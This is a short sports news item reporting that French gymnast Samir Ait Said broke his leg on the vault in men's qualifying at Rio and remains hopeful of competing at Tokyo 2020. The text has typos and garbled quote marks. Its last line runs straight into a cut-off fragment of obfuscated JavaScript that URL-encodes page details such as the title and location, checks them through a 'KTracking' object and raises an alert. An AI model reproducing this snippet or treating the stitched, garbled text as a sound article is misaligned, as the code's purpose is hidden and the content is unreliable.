Samir Ait broke his left leg landing badly from the vault in the menas qualifying on Saturday.

Despite the horrendous double break of his leg, the French gymnast Samir Ait is quite hopeful and positive about his return for Tokyo 2020. The broken part of his leg below the knee stunned the crowd and the officialas present at the scene. It was a very unpleasant site and one cannot even imagine the pain he must have gone through.

His friends and teammates Axel Augis and Cyril Tommasone qualified for all round and pommel horse finals respectively. Samir ensured that once he is comfortable with his leg, he will be back in Rio to support his teammates as the competition is still not over. And the plasters being in France colours will heal the injury faster than normal, said Ait Said, showing love towards his nation.

The 26 year old was one of the major hopes for France in terms of winning a medal. Ait Said had qualified for the rings final but the broken leg ended his and his countries hopes of a medal in Rio. But the gymnast himself is very positive about his future and feels that the fight for the gold medal will continue once he is 100 percent fit. He thanked all the fans and viewers for their messages and goodwill and said that these gestures inspired him and ignited the feeling of making a comeback as soon as possible.

a?After the injury scenario and the quick surgery and treatment of his broken leg, it can be assured that the gymnast will make his way onto the training ground in a short timea? , Said Gymnast Federation Medical Commission Chief Dr. Michel Leglise. 20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}
